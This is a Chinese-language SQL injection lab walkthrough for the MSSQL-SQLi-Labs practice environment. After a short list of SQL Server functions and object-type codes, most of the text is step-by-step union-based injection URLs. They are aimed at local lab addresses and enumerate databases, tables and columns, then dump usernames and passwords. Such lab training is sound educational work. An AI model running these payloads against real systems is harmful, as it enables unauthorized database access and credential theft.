注一下入 | MsSql数据库搞一下子？（一）

下载地址：https://github.com/Larryxi/MSSQL-SQLi-Labs/archive/refs/heads/master.zip

#简单说几个SqlServer的函数： select @@version              --查询版本 select user                   --查询用户 select user_name() select system_user select current_user select db_name()/db_name(0)   --查询库名

sysobjects：记录了数据库中所有表，常用字段为id、name和xtype。 syscolumns：记录了数据库中所有表的字段，常用字段为id、name和xtype。 

对象类型：AF = 聚合函数 (CLR) C = CHECK 约束 D = DEFAULT（约束或独立） FN = SQL 标量函数 FS = 程序集 (CLR) 标量函数 FT = 程序集 (CLR) 表值函数 IF = SQL 内联表值函数 IT = 内部表 P = SQL 存储过程 PC = 程序集 (CLR) 存储过程 PG = 计划指南 PK = PRIMARY KEY 约束 R = 规则（旧式，独立） RF = 复制筛选过程 S = 系统基表 SN = 同义词 SQ = 服务队列TA = 程序集 (CLR) DML 触发器 TF = SQL 表值函数 TR = SQL DML 触发器 U = 表（用户定义类型） UQ = UNIQUE 约束 V = 视图 X = 扩展存储过程

#使用<>获取数据    http://192.168.4.223:59856/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058' and name<>'id' and name<>'username'--   #使用not in获取数据    http://192.168.4.223:59856/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058' and name not in ('id','username')--  

http://192.168.4.223:59856/less-1.asp?id=1' and (select count(*) from sysobjects)>0--  

http://192.168.11.132:59856/less-1.asp?id=1' order by 3-- 

http://192.168.11.132:59856/less-1.asp?id=-1' union select 1,2,3--  

http://192.168.11.132:59856/less-1.asp?id=-1' union select 1,db_name(),3--   http://192.168.11.132:59856/less-1.asp?id=-1' union select 1,db_name(0),3--   http://192.168.11.132:59856/less-1.asp?id=-1' union select 1,db_name(1),3--   http://192.168.11.132:59856/less-1.asp?id=-1' union select 1,db_name(2),3--   http://192.168.11.132:59856/less-1.asp?id=-1' union select 1,db_name(3),3--  

http://192.168.11.132:59856/less-1.asp?id=-1' union select 1,id,name from dbo.sysobjects where xtype='U'--   

#使用<>来排除，获取下一表名  http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,id,name from dbo.sysobjects where xtype='U' and name <> 'emails' --   #通过此方式逐步排除，获取到users表  http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,id,name from dbo.sysobjects where xtype='U' and name <> 'emails' and name <> 'uagents' and name <> 'referers' and name <> 'sqlmapoutput '--    

#或者通过id这一列来做排除      http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,id,name from dbo.sysobjects where xtype='U' and id <> 21575115 --   

#或者通过not in 来进行排除，后续同理，逐步排除   http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,id,name from dbo.sysobjects where xtype='U' and id not in('21575115') --    http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,id,name from dbo.sysobjects where xtype='U' and name not in('uagents ') --   

#获取users表中的第一列  http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,id,name from dbo.syscolumns where id=2105058535--  

#获取第二列（这里的连接条件我们就不能再用id来作为条件了，用查询出来的name作为条件，已经得到第一列的列名为id，我们需要排除这一列）   http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,id,name from dbo.syscolumns where id='2105058535' and name <> 'id'--  

#获取第三列   http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,id,name from dbo.syscolumns where id='2105058535' and name <> 'id' and name <> 'password'--  

#获取第一个表，后续通过添加条件列举排除，以此来逐个获取  http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,2,(select top 1 table_name from information_schema.tables)--   http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,2,(select top 1 table_name from information_schema.tables where table_name <> 'emails')--  http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,2,(select top 1 table_name from information_schema.tables where table_name <> 'emails' and table_name<>'uagents' and table_name<>'referers' and table_name<>'sqlmapoutput')-- 

#获取第一条数据  http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,username,password from users--   #通过条件排除，获取第二条数据  http://192.168.230.131:59856/less-1.asp?id=-1' union select 1,username,password from users where username<>'admin'--